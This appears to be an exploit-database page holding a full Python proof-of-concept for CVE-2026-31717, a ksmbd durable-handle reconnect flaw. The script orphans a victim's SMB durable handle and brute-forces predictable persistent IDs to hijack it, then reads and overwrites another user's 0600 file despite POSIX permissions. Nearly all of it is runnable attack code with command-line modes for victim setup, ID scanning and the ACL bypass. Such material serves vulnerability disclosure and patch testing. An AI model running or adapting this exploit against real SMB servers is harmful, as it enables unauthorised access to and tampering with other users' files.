5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3
"""
CVE-2026-31717 — ksmbd DHnC durable-handle reconnect access-control bypass
==========================================================================

smb2_check_durable_oplock() in fs/smb/server/oplock.c falls through the
non-lease branch (oplock.c:1852-1864 `goto out`) without verifying the
reconnecting user. parse_durable_handle_context() (smb2pdu.c:2796) only
looks up by attacker-supplied persistent_id; idr_alloc_cyclic() makes
those IDs trivially predictable.

Impact: any authenticated SMB user can hijack an orphaned v1 durable
handle belonging to another user. Subsequent read/write goes through
the original opener's struct file (fp->filp), so kernel_read/write use
the victim's f_cred — bypassing POSIX ACLs.

Affected dialects: SMB 2.1 (0x0210) and above. v1 (DHnQ/DHnC) is the
bruteforceable path; v2 (DH2C) gates by 128-bit CreateGuid.

Public reference:
  https://lore.kernel.org/linux-cve-announce/2026050124-CVE-2026-31717-f68b@gregkh/

Modes:
  acl-bypass   POSIX-0600 ACL-bypass demonstration (headline)
  victim       Phase 1 only — open + orphan (cross-host setup)
  attack       Phase 2 only — bruteforce a PID range (cross-host setup)
"""

import argparse
import socket
import struct
import sys
import time

from impacket.smbconnection import SMBConnection
from impacket import smb3, smb3structs as s
from impacket.nt_errors import STATUS_SUCCESS

# NT status value that the ACL control check compares against.
STATUS_ACCESS_DENIED = 0xC0000022

# Maps the --dialect command-line choice to the impacket dialect constant
# that is passed as preferredDialect when the connection is created.
DIALECT_MAP = {
    "2.1":   s.SMB2_DIALECT_21,
    "3.0":   s.SMB2_DIALECT_30,
    "3.1.1": s.SMB2_DIALECT_311,
}


# ── Helpers to build raw create contexts ────────────────────────────

def build_create_context(name, data, is_last=True):
    """Serialize one SMB2_CREATE_CONTEXT entry.

    Layout produced: a 16-byte fixed header, the name zero-padded up to a
    multiple of 8 bytes, then the data.

    name: context name bytes (e.g. b"DHnQ")
    data: context payload bytes
    is_last: when False, the Next field holds the 8-byte-aligned size of this
        entry and the entry is zero-padded to that size so another context
        can follow; when True, Next is 0 and no tail padding is appended.
    """
    header_len = 16  # the name begins right after the fixed header

    def align8(n):
        # Round n up to the next multiple of 8.
        return (n + 7) & ~7

    name_field = name.ljust(align8(len(name)), b"\x00")
    payload_start = header_len + len(name_field)
    unpadded_len = payload_start + len(data)
    next_field = align8(unpadded_len) if not is_last else 0

    blob = b"".join((
        struct.pack("<I HH HH I",
                    next_field,       # Next
                    header_len,       # NameOffset
                    len(name),        # NameLength
                    0,                # Reserved
                    payload_start,    # DataOffset
                    len(data)),       # DataLength
        name_field,
        data,
    ))

    if is_last:
        return blob
    # Chained entry: extend with zeros so the following context is aligned.
    return blob.ljust(next_field, b"\x00")


def build_dhnq_context():
    """Return the DHnQ (Durable Handle Request v1) create context.

    The payload is 16 zero bytes; the entry is built as the last (only)
    context in the chain."""
    zero_payload = bytes(16)
    return build_create_context(b"DHnQ", zero_payload, is_last=True)


def build_dhnc_context(persistent_id):
    """Return the DHnC (Durable Handle Reconnect v1) create context.

    The payload is an SMB2_FILEID: the given persistent ID followed by a
    volatile ID of zero, each packed as a little-endian 64-bit integer."""
    volatile_id = 0
    file_id_blob = struct.pack("<QQ", persistent_id, volatile_id)
    return build_create_context(name=b"DHnC", data=file_id_blob)


# ── SMB2 client wrapper using impacket ──────────────────────────────

class KsmbdClient:
    """Thin wrapper around impacket's SMBConnection for the exploit.

    Holds one connection (`conn`) and one tree connect (`tree_id`). CREATE,
    READ and WRITE requests are assembled by hand from impacket's
    smb3structs and pushed through the low-level sendSMB()/recvSMB() pair,
    so the oplock level and create contexts can be set explicitly.
    """

    def __init__(self, target, port=445):
        """Store the server address; no network I/O happens here.

        target: server host/IP (later used as both remote name and host)
        port: TCP port of the SMB service
        """
        self.target = target
        self.port = port
        # Set by connect_and_auth(); reset to None by disconnect_orphan().
        self.conn = None
        # Set by tree_connect().
        self.tree_id = None

    def connect_and_auth(self, username, password, domain="", dialect="3.0"):
        """Connect, negotiate the requested dialect, authenticate.

        dialect must be a key of DIALECT_MAP; any other value raises
        KeyError before a connection is attempted. The connection is created
        with a 30-second timeout. Prints the session ID on success.
        """
        self.conn = SMBConnection(self.target, self.target, sess_port=self.port,
                                  preferredDialect=DIALECT_MAP[dialect],
                                  timeout=30)
        self.conn.login(username, password, domain)
        print(f"  [+] Authenticated as '{username}' over SMB {dialect}, "
              f"session=0x{self.conn.getSMBServer()._Session['SessionID']:X}")

    def tree_connect(self, share):
        """Connect to a share and remember the resulting tree ID."""
        self.tree_id = self.conn.connectTree(share)
        print(f"  [+] Connected to {share}, tree=0x{self.tree_id:X}")

    def create_durable(self, filename):
        """Open/create file with batch oplock + DHnQ (v1 durable handle request).

        Returns (persistent_id, volatile_id, file_id) where file_id is an
        SMB2_FILEID structure populated with the two IDs.
        Raises RuntimeError if the server's status is not STATUS_SUCCESS.
        A granted oplock other than BATCH only produces a printed warning.
        """
        smb = self.conn.getSMBServer()

        # Build CREATE request manually for full control over oplock + contexts
        pkt = smb3.SMB2Packet()
        pkt['Command'] = s.SMB2_CREATE
        pkt['TreeID'] = self.tree_id

        create_req = s.SMB2Create()
        create_req['SecurityFlags'] = 0
        create_req['RequestedOplockLevel'] = s.SMB2_OPLOCK_LEVEL_BATCH
        create_req['ImpersonationLevel'] = s.SMB2_IL_IMPERSONATION
        create_req['DesiredAccess'] = (s.FILE_READ_DATA | s.FILE_WRITE_DATA |
                                       s.FILE_READ_ATTRIBUTES | s.DELETE |
                                       s.SYNCHRONIZE)
        create_req['FileAttributes'] = s.FILE_ATTRIBUTE_NORMAL
        create_req['ShareAccess'] = s.FILE_SHARE_READ | s.FILE_SHARE_WRITE
        # FILE_OVERWRITE_IF truncates if existing — keeps the demo's read
        # output clean (no leftover placeholder bytes after the secret).
        create_req['CreateDisposition'] = s.FILE_OVERWRITE_IF
        create_req['CreateOptions'] = s.FILE_NON_DIRECTORY_FILE

        # Filename (NameLength counts bytes of the UTF-16LE encoding)
        name_bytes = filename.encode("utf-16-le")
        create_req['NameLength'] = len(name_bytes)

        # Create context: DHnQ (durable handle request)
        dhnq = build_dhnq_context()
        create_req['CreateContextsLength'] = len(dhnq)

        # Assemble buffer: name + zero padding up to a multiple of 8 + contexts
        name_padded = name_bytes + b"\x00" * ((8 - len(name_bytes) % 8) % 8)
        create_req['Buffer'] = name_padded + dhnq

        # Fix offsets (relative to start of SMB2 header)
        # SMB2 header = 64 bytes, CREATE fixed body = 56 bytes (StructureSize=57, odd)
        name_offset = 64 + 56  # 120
        ctx_offset = name_offset + len(name_padded)
        create_req['NameOffset'] = name_offset
        create_req['CreateContextsOffset'] = ctx_offset

        pkt['Data'] = create_req

        smb.sendSMB(pkt)
        resp = smb.recvSMB()

        status = resp['Status']
        if status != STATUS_SUCCESS:
            raise RuntimeError(f"CREATE failed: 0x{status:08X}")

        create_resp = s.SMB2Create_Response(resp['Data'])
        oplock = create_resp['OplockLevel']
        pid = create_resp['FileID'].fields['Persistent']
        vid = create_resp['FileID'].fields['Volatile']

        print(f"  [+] Opened '{filename}' - oplock=0x{oplock:02X}, "
              f"persistent_id={pid}, volatile_id={vid}")

        if oplock != s.SMB2_OPLOCK_LEVEL_BATCH:
            print(f"  [!] WARNING: Got oplock 0x{oplock:02X}, not BATCH (0x09)")

        # Rebuild a standalone SMB2_FILEID for use in later READ/WRITE requests.
        file_id = s.SMB2_FILEID()
        file_id['Persistent'] = pid
        file_id['Volatile'] = vid
        return pid, vid, file_id

    def create_reconnect_dhnc(self, persistent_id):
        """Attempt DHnC reconnect to an orphaned durable handle.

        Sends a CREATE with an empty file name and a single DHnC context
        carrying persistent_id.

        Returns (persistent_id, volatile_id, file_id) on success, where the
        IDs come from the server's response and file_id is an SMB2_FILEID.
        Returns None for any non-success status; the status is printed
        unless it is 0xC0000034.
        """
        smb = self.conn.getSMBServer()

        pkt = smb3.SMB2Packet()
        pkt['Command'] = s.SMB2_CREATE
        pkt['TreeID'] = self.tree_id

        create_req = s.SMB2Create()
        create_req['SecurityFlags'] = 0
        create_req['RequestedOplockLevel'] = s.SMB2_OPLOCK_LEVEL_BATCH
        create_req['ImpersonationLevel'] = s.SMB2_IL_IMPERSONATION
        # DesiredAccess MUST be non-zero - ksmbd rejects 0 at smb2pdu.c:3090
        # before reaching the durable context handler. Read and write data
        # access are requested here.
        create_req['DesiredAccess'] = s.FILE_READ_DATA | s.FILE_WRITE_DATA
        create_req['FileAttributes'] = 0
        create_req['ShareAccess'] = s.FILE_SHARE_READ | s.FILE_SHARE_WRITE
        create_req['CreateDisposition'] = s.FILE_OPEN
        create_req['CreateOptions'] = s.FILE_NON_DIRECTORY_FILE

        # Empty filename
        create_req['NameLength'] = 0

        # DHnC context with target persistent_id
        dhnc = build_dhnc_context(persistent_id)
        create_req['CreateContextsLength'] = len(dhnc)

        # Buffer: pad for name area + contexts
        # (8 zero bytes stand in for the name even though NameLength is 0)
        name_pad = b"\x00" * 8
        create_req['Buffer'] = name_pad + dhnc

        # Same offset arithmetic as create_durable(): 64-byte header + 56-byte body.
        name_offset = 64 + 56
        ctx_offset = name_offset + len(name_pad)
        create_req['NameOffset'] = name_offset
        create_req['CreateContextsOffset'] = ctx_offset

        pkt['Data'] = create_req

        smb.sendSMB(pkt)
        resp = smb.recvSMB()

        status = resp['Status']
        if status != STATUS_SUCCESS:
            if status != 0xC0000034:  # STATUS_OBJECT_NAME_NOT_FOUND (expected for non-existent IDs)
                print(f"  [*] pid={persistent_id}: status=0x{status:08X}")
            return None

        create_resp = s.SMB2Create_Response(resp['Data'])
        pid = create_resp['FileID'].fields['Persistent']
        vid = create_resp['FileID'].fields['Volatile']

        file_id = s.SMB2_FILEID()
        file_id['Persistent'] = pid
        file_id['Volatile'] = vid
        return pid, vid, file_id

    def normal_create_status(self, filename, access=s.FILE_READ_DATA):
        """Plain CREATE with no DH context. Used as the ACL control test:
        on a 0600 file owned by another user, ksmbd must return
        STATUS_ACCESS_DENIED.

        Returns an NT status code:
          - STATUS_SUCCESS if the open worked (the handle is then closed on
            a best-effort basis; close errors are ignored);
          - STATUS_ACCESS_DENIED if the exception text contains
            "ACCESS_DENIED" or "C0000022" (case-insensitive);
          - otherwise the first whitespace/comma-separated token of the
            exception text that starts with "0x" and parses as hex.
        Re-raises the original exception when no status can be extracted.
        """
        try:
            file_id = self.conn.openFile(self.tree_id, filename,
                                         desiredAccess=access,
                                         shareMode=s.FILE_SHARE_READ,
                                         creationDisposition=s.FILE_OPEN)
            try:
                self.conn.closeFile(self.tree_id, file_id)
            except Exception:
                pass
            return STATUS_SUCCESS
        except Exception as e:
            # The status is recovered from the message text, not from an
            # attribute of the exception object.
            msg = str(e).upper()
            # impacket raises with status hex/name in the string
            if "ACCESS_DENIED" in msg or "C0000022" in msg:
                return STATUS_ACCESS_DENIED
            for tok in msg.replace(",", " ").split():
                if tok.startswith("0X"):
                    try:
                        return int(tok, 16)
                    except ValueError:
                        pass
            raise

    def read_file(self, file_id, offset=0, length=4096):
        """Read from an open file handle.

        file_id: SMB2_FILEID of the open handle
        offset: byte offset to read from
        length: number of bytes requested
        Returns the 'Buffer' field of the parsed READ response.
        Raises RuntimeError if the status is not STATUS_SUCCESS.
        """
        smb = self.conn.getSMBServer()

        pkt = smb3.SMB2Packet()
        pkt['Command'] = s.SMB2_READ
        pkt['TreeID'] = self.tree_id

        read_req = s.SMB2Read()
        # NOTE(review): 0x50 = 80; presumably the requested data offset in
        # the response (64-byte header + 16-byte fixed part) — confirm.
        read_req['Padding'] = 0x50
        read_req['Length'] = length
        read_req['Offset'] = offset
        read_req['FileID'] = file_id
        read_req['MinimumCount'] = 0
        read_req['RemainingBytes'] = 0

        pkt['Data'] = read_req

        smb.sendSMB(pkt)
        resp = smb.recvSMB()

        status = resp['Status']
        if status != STATUS_SUCCESS:
            raise RuntimeError(f"READ failed: 0x{status:08X}")

        read_resp = s.SMB2Read_Response(resp['Data'])
        return read_resp['Buffer']

    def write_file(self, file_id, data, offset=0):
        """Write to an open file handle.

        file_id: SMB2_FILEID of the open handle
        data: bytes to write
        offset: byte offset to write at
        Returns the 'Count' field of the parsed WRITE response.
        Raises RuntimeError if the status is not STATUS_SUCCESS.
        """
        smb = self.conn.getSMBServer()

        pkt = smb3.SMB2Packet()
        pkt['Command'] = s.SMB2_WRITE
        pkt['TreeID'] = self.tree_id

        write_req = s.SMB2Write()
        write_req['FileID'] = file_id
        write_req['Length'] = len(data)
        write_req['Offset'] = offset
        write_req['WriteChannelInfoOffset'] = 0
        write_req['WriteChannelInfoLength'] = 0
        write_req['Channel'] = 0
        write_req['RemainingBytes'] = 0
        write_req['Flags'] = 0
        write_req['Buffer'] = data

        pkt['Data'] = write_req

        smb.sendSMB(pkt)
        resp = smb.recvSMB()

        status = resp['Status']
        if status != STATUS_SUCCESS:
            raise RuntimeError(f"WRITE failed: 0x{status:08X}")

        write_resp = s.SMB2Write_Response(resp['Data'])
        return write_resp['Count']

    def disconnect_orphan(self, graceful=False):
        """Drop the session WITHOUT closing the durable handle.

        Default: TCP RST via SO_LINGER {1, 0} — models a real orphan event
        (laptop sleep, WiFi roam, VPN flap, NIC down). graceful=True sends
        SMB2 LOGOFF + FIN instead. Either way, fp->conn becomes NULL and the
        handle persists in global_ft until the durable scavenger reaps it.

        If the socket cannot be obtained, or the RST path raises, the method
        falls through to the graceful path. self.conn is set to None on
        every exit path. Never raises: all errors are caught.
        """
        try:
            sock = self.conn.getSMBServer().get_socket()
        except Exception:
            sock = None

        if not graceful and sock is not None:
            try:
                # l_onoff=1, l_linger=0: close() then discards unsent data
                # and resets the connection rather than closing it normally.
                sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,
                                struct.pack("ii", 1, 0))
                sock.close()
                print("  [+] TCP RST sent — handle orphaned in ksmbd")
                self.conn = None
                return
            except Exception as e:
                print(f"  [!] RST failed ({e}); falling back to graceful close")

        # NOTE(review): both calls are best-effort; if either raises (also
        # when self.conn is already None) the error is swallowed and the
        # success message below is still printed.
        try: self.conn.logoff()
        except Exception: pass
        try: self.conn.getSMBServer().close_session()
        except Exception: pass
        print("  [+] Session graceful logoff (LOGOFF + FIN) — handle orphaned")
        self.conn = None


# ── Exploit phases ──────────────────────────────────────────────────

def phase_victim(args, secret=b"1337 stuff\n"):
    """Phase 1: play the victim.

    Authenticates as args.user, opens args.file through a durable-handle
    CREATE, writes `secret` into it, reads it back, and then drops the
    connection without closing the handle (TCP RST unless args.graceful).

    args: parsed CLI namespace (target, port, share, user, password, domain,
        dialect, file, graceful)
    secret: bytes written through the freshly opened handle
    Returns the persistent ID of the handle that was left behind.
    """
    print("[*] Phase 1: Victim creates durable handle")
    print(f"    Target: {args.target}:{args.port}")
    print(f"    Share:  {args.share}")
    print(f"    User:   {args.user}")
    print(f"    File:   {args.file}")

    # Session setup as the victim user.
    victim = KsmbdClient(args.target, args.port)
    victim.connect_and_auth(
        args.user,
        args.password,
        args.domain,
        dialect=args.dialect,
    )
    victim.tree_connect(args.share)

    # Only the persistent ID and the FILEID structure are needed afterwards.
    pid, _volatile, handle = victim.create_durable(args.file)

    written = victim.write_file(handle, secret)
    print(f"  [+] Wrote {written} bytes of sensitive data")

    # Read back exactly as many bytes as were written, as a sanity check.
    data = victim.read_file(handle, length=len(secret))
    print(f"  [+] Verified read: {data[:50]}...")

    print(f"\n  [*] Persistent ID to target: {pid}")
    victim.disconnect_orphan(graceful=args.graceful)
    print(f"  [+] Handle {pid} orphaned (persists until durable scavenger timeout).\n")
    return pid


def phase_attack(args, known_pid=None):
    """Phase 2: walk a range of persistent IDs and try a DHnC reconnect on each.

    Credentials come from args.user2/args.password2 when present and
    non-empty, otherwise from args.user/args.password. The range is
    args.pid_start..args.pid_end inclusive (defaults 0 and 64 when the
    attributes are missing). If known_pid is given it is tried first.

    On the first successful reconnect the function attempts one read and one
    write through the handle (failures are printed, not raised) and stops.
    If a reconnect attempt raises, a new session is opened and the scan
    moves on to the next ID; if that new session cannot be opened the scan
    is aborted.

    Returns the list of hijacked persistent IDs (empty, or one element).
    """
    print("[*] Phase 2: Attacker hijacks orphaned durable handle")
    atk_user = getattr(args, "user2", None) or args.user
    atk_pass = getattr(args, "password2", None) or args.password
    print(f"    Target: {args.target}:{args.port}")
    print(f"    User:   {atk_user}")

    pid_start = getattr(args, "pid_start", 0)
    pid_end = getattr(args, "pid_end", 64)
    print(f"    Brute-force range: {pid_start}-{pid_end}")

    def open_session():
        # Fresh authenticated session with the share already connected.
        client = KsmbdClient(args.target, args.port)
        client.connect_and_auth(atk_user, atk_pass, args.domain,
                                dialect=args.dialect)
        client.tree_connect(args.share)
        return client

    c = open_session()

    print("  [*] Scanning persistent IDs for orphaned durable handles...")

    candidates = list(range(pid_start, pid_end + 1))
    if known_pid is not None:
        # The known ID goes to the front and is not repeated later.
        candidates = [known_pid] + [p for p in candidates if p != known_pid]

    hijacked = []

    for pid in candidates:
        try:
            result = c.create_reconnect_dhnc(pid)
        except Exception as e:
            # Connection may reset - reconnect
            print(f"  [*] Error at pid={pid}: {e}, reconnecting...")
            try:
                c = open_session()
            except Exception:
                print("  [!] Reconnect failed, aborting scan")
                break
            continue

        if result is not None:
            _, _, new_fid = result
            print(f"\n  [!!] HIJACKED persistent_id={pid} as '{atk_user}'")

            try:
                raw = c.read_file(new_fid, length=4096)
                data = raw.rstrip(b"\x00").rstrip()
                print(f"  [!!] READ {len(data)} bytes: {data!r}")
            except Exception as e:
                print(f"  [*] Read attempt: {e}")

            try:
                written = c.write_file(new_fid, b"It's my session now :)\n", offset=0)
                print(f"  [!!] WROTE {written} bytes (overwrote victim's content)")
            except Exception as e:
                print(f"  [*] Write attempt: {e}")

            hijacked.append(pid)
            break  # Got one

        # Miss: emit a progress marker on every tenth ID.
        if pid != known_pid and pid % 10 == 0:
            sys.stdout.write(f"\r  [*] Scanned pid={pid}...")
            sys.stdout.flush()

    if hijacked:
        print(f"\n  [+] Successfully hijacked {len(hijacked)} handle(s): {hijacked}")
    else:
        print(f"\n  [-] No orphaned durable handles found in range {pid_start}-{pid_end}")

    return hijacked


def phase_acl_bypass(args):
    """Headline scenario: prove POSIX 0600 ACL bypass.

    Sequence:
      (a) phase_victim() opens args.file, writes a marker and disconnects;
      (b)+(c) the attacker (args.user2) logs in and a plain CREATE is
          expected to be refused with STATUS_ACCESS_DENIED — if it is not,
          the demo aborts;
      (d) a DHnC reconnect to the victim's persistent ID is attempted,
          followed by a read and a write through the returned handle; if
          the direct reconnect fails, phase_attack() is run over pid±2 and
          the function returns afterwards;
      (e) a fresh attacker session repeats the plain-CREATE control.

    The two controls bracket the exploit: if normal CREATE is denied both
    before AND after, but read+write worked via the reconnect, then
    f_cred-bypass is the only explanation.

    Returns None.
    """
    banner_rule = "=" * 70
    print(banner_rule)
    print("CVE-2026-31717 PoC — POSIX ACL bypass via DHnC durable-handle hijack")
    print(banner_rule)
    print()

    atk_user = args.user2
    atk_pass = args.password2
    rw = s.FILE_READ_DATA | s.FILE_WRITE_DATA

    def new_attacker_client():
        # Authenticated attacker session with the share connected.
        client = KsmbdClient(args.target, args.port)
        client.connect_and_auth(atk_user, atk_pass, args.domain,
                                dialect=args.dialect)
        client.tree_connect(args.share)
        return client

    def run_control(client, label):
        # True only when a plain CREATE is refused with ACCESS_DENIED.
        st = client.normal_create_status(args.file, access=rw)
        denied = st == STATUS_ACCESS_DENIED
        if denied:
            print(f"  [+] CONTROL {label}: normal CREATE → STATUS_ACCESS_DENIED ✓")
        else:
            print(f"  [!] CONTROL {label}: status=0x{st:08X} (expected 0xC0000022)")
        return denied

    # (a) Victim opens, writes, abrupt-disconnects.
    pid = phase_victim(args, secret=b"TOP SECRET\n")
    print("[*] Waiting 3 seconds for ksmbd to mark the handle orphaned...")
    time.sleep(3)

    # (b)+(c) Attacker authenticates and proves it can't reach the file normally.
    print(f"\n[*] Phase 2: Attacker '{atk_user}' attempts ACL bypass")
    c = new_attacker_client()
    if not run_control(c, "pre-exploit"):
        print(f"      Server-side ACL setup is wrong ({atk_user} can already "
              f"access {args.file}). Aborting demo.")
        return

    # (d) Exploit: DHnC reconnect, read+write through victim's f_cred.
    print(f"\n  [*] DHnC reconnect to known pid={pid}")
    result = c.create_reconnect_dhnc(pid)
    if result is None:
        print("  [-] direct reconnect failed; brute-forcing pid±2")
        try:
            c.disconnect_orphan(graceful=True)
        except Exception:
            pass
        args.pid_start = max(0, pid - 2)
        args.pid_end = pid + 2
        found = phase_attack(args, known_pid=pid)
        if not found:
            print("  [-] No handle hijacked. Was the victim's pid reaped already?")
        return

    _, _, new_fid = result
    print(f"  [!!] HIJACKED persistent_id={pid}")

    data = c.read_file(new_fid, length=4096).rstrip(b"\x00")
    print(f"  [!!] READ as {atk_user}: {data!r}  (POSIX 0600 bypassed)")

    marker = f"PWNED by {atk_user}\n".encode()
    written = c.write_file(new_fid, marker)
    print(f"  [!!] WROTE {written} bytes as {atk_user}  (POSIX 0600 bypassed)")

    # (e) Reconnect cleanly and prove the file mode is unchanged.
    try:
        c.disconnect_orphan(graceful=True)
    except Exception:
        pass
    print()
    if run_control(new_attacker_client(), "post-exploit"):
        print("      File POSIX mode unchanged; writes only succeeded because "
              "the hijacked fp->filp carried the victim's f_cred.")

    print("\n  [+] Server-side verification (run on the ksmbd host):")
    print(f"      stat {args.file}  &&  cat {args.file}")
    print(f"      Expect: 0600 victim:victim, contents = 'PWNED by {atk_user}\\n'")


# ── Main ────────────────────────────────────────────────────────────

def main():
    """Parse the command line and run the selected mode.

    Three sub-commands share the connection options (--target, --port,
    --share, --user, --password, --domain, --dialect, --graceful):
      victim      adds --file
      attack      adds --pid-start / --pid-end
      acl-bypass  adds --file, --user2 and --password2
    The module docstring is shown as the help epilog.
    """
    parser = argparse.ArgumentParser(
        description="CVE-2026-31717: ksmbd DHnC durable-handle hijack PoC",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=__doc__,
    )
    sub = parser.add_subparsers(dest="mode", required=True)

    # Insertion order determines the order in which sub-commands are listed.
    mode_help = {
        "victim": "Create durable handle as victim",
        "attack": "Hijack orphaned handle as attacker",
        "acl-bypass": "Headline: POSIX 0600 ACL bypass",
    }

    for name, help_text in mode_help.items():
        p = sub.add_parser(name, help=help_text)

        # Options common to every mode.
        p.add_argument("--target", required=True, help="ksmbd server IP")
        p.add_argument("--port", type=int, default=445)
        p.add_argument("--share", required=True, help="Share name")
        p.add_argument("--user", required=True, help="Username")
        p.add_argument("--password", required=True, help="Password")
        p.add_argument("--domain", default="")
        p.add_argument("--dialect", choices=list(DIALECT_MAP), default="3.0",
                       help="SMB dialect to negotiate (default: 3.0; 2.1 also works)")
        p.add_argument("--graceful", action="store_true",
                       help="Use SMB2 LOGOFF + FIN instead of TCP RST when orphaning")

        # Mode-specific options.
        if name != "attack":
            p.add_argument("--file", default="secret.txt")
        else:
            p.add_argument("--pid-start", type=int, default=0)
            p.add_argument("--pid-end", type=int, default=64)
        if name == "acl-bypass":
            p.add_argument("--user2", required=True, help="Attacker username")
            p.add_argument("--password2", required=True, help="Attacker password")

    args = parser.parse_args()

    handlers = {
        "victim": phase_victim,
        "attack": phase_attack,
        "acl-bypass": phase_acl_bypass,
    }
    handler = handlers.get(args.mode)
    if handler is not None:
        handler(args)


# Run the command-line interface only when executed as a script, not on import.
if __name__ == "__main__":
    main()